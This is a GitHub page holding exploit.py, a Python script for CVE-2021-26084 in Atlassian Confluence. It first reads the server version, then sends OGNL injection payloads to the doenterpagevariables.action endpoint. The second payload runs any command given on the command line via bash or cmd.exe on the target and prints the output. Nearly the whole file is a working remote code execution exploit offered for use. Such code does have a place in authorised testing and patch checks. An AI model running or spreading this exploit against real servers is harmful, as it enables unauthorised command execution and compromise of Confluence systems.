-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathexploit.py
70 lines (63 loc) · 3.32 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import requests
import re
import sys
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings()
def check(host):
r = requests.get(host+"/login.action")
if(r.status_code == 200):
filter_version = re.findall("<span id='footer-build-information'>.*</span>",r.text)
if(len(filter_version)>=1):
version = filter_version[0].split("'>")[1].split('</')[0]
return version
else:
return False
else:
return host
def exploit(host, command):
if(command == 0):
payload = "%5Cu0027%2b#{%5Cu0022%5Cu0022[%5Cu0022class%5Cu0022]}%2b%5Cu0027"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
r = requests.post(host + "/pages/doenterpagevariables.action", data="queryString="+payload, headers=headers, verify=False)
soup = BeautifulSoup(r.text, "html.parser")
try:
comand_result = soup.find("input", {"name":"queryString"})['value']
return comand_result
except:
return False
else:
command = command.replace('"', '%5Cu0022').replace("'","%5Cu0027").replace(' ',"%20")
#payload = "%5Cu0027%2b#{%5Cu0022%5Cu0022[%5Cu0022class%5Cu0022].forName(java.lang.Runtime).getRuntime().exec(%5Cu0027"+command+"%5Cu0027)}%2b%5Cu0027" - payload without output using Runtime
payload = "%5cu0027%2b{Class.forName(%5cu0027javax.script.ScriptEngineManager%5cu0027).newInstance().getEngineByName(%5cu0027JavaScript%5cu0027).%5cu0065val(%5cu0027var+isWin+%3d+java.lang.System.getProperty(%5cu0022os.name%5cu0022).toLowerCase().contains(%5cu0022win%5cu0022)%3b+var+cmd+%3d+new+java.lang.String(%5cu0022"+command+"%5cu0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(%5cu0022cmd.exe%5cu0022,+%5cu0022/c%5cu0022,+cmd)%3b+}+else{p.command(%5cu0022bash%5cu0022,+%5cu0022-c%5cu0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}%5cu0027)}%2b%5cu0027"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
r = requests.post(host + "/pages/doenterpagevariables.action", data="queryString="+payload, headers=headers, verify=False)
soup = BeautifulSoup(r.text, "html.parser")
if(soup.find("input", {"name":"queryString"})['value']):
comand_result = soup.find("input", {"name":"queryString"})['value']
return comand_result
if(len(sys.argv) < 3):
print("USE: python3 " + sys.argv[0] + " https://target.com cmd")
print("ex: python3 " + sys.argv[0] + " https://target.com id")
else:
target = sys.argv[1]
cmd = sys.argv[2]
version = check(target)
print("============ GET Confluence Version ============")
if(version):
print("Version: " + version)
else:
print("Version: Not Found")
print('\n')
print("=== Testing OGNL payload with simple payload ===")
result = exploit(target,0)
if result and 'class java.lang.String' in result:
print("Command Output: " + result)
print("\033[0;31m[!] This target is vulnerable to CVE-2021-26084\033[0m")
print('\n')
print("=== Send OGNL payload with RCE ===")
result = exploit(target,cmd)
print("Command Output: " + result)
print('\n')
else:
print("[x] This target is not vulnerable!")